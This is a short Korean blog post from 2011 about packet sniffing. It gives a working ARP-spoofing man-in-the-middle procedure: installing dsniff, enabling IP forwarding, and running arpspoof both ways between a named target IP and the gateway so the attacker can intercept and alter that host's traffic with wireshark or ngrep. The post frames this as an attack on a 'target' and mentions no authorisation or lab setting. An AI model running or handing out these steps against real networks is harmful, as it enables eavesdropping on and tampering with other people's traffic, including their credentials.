스니핑(sniffing)

2011년 8월 8일 월요일

스니핑(sniffing)은 패킷을 감청하는 것을 의미한다.
허브에 PC1~PC8까지 연결되어 있다고 할 경우,
그 중 임의의 컴퓨터에서 자신을 포함한 다른 컴퓨터에서 보내는 패킷을 감청할 수 있다.
자신의 랜카드가 promiscuous 모드를 지원한다면, wireshark 로 보면 된다.
자신의 랜카드가 promiscuous 모드를 지원하지 않을 경우에는 wireshark로 보면 자신의 것밖에는 보이지 않는다. 이 경우, arpspoof 를 이용한다. arpspoof 는 dsniff 패키지에 들어있다.

apt-get install dsniff

# ip forward 기능 활성화
echo 1 > /proc/sys/net/ipv4/ip_forward

# gateway ip: 192.168.10.1 또는 192.168.1.1, 게이트웨이 IP는 다를 수 있다.
# 목표물 ip: 192.168.10.5
arpspoof -t 192.168.10.5 192.168.10.1 &
arpspoof -t 192.168.10.1 192.168.10.5 &

이렇게 하면 공격자가 목표물과 gateway 사이에 끼어들게 된다.

목표물(192.168.10.5) -- 공격자 -- gateway -- 외부 네트워크

따라서 패킷 감청, 변조가 가능하다. ngrep, wireshark 등의 프로그램으로 패킷을 감청할 수 있다.
작업을 끝낸 후에는 killall arpspoof 명령으로 위의 프로세스를 죽이도록 하자.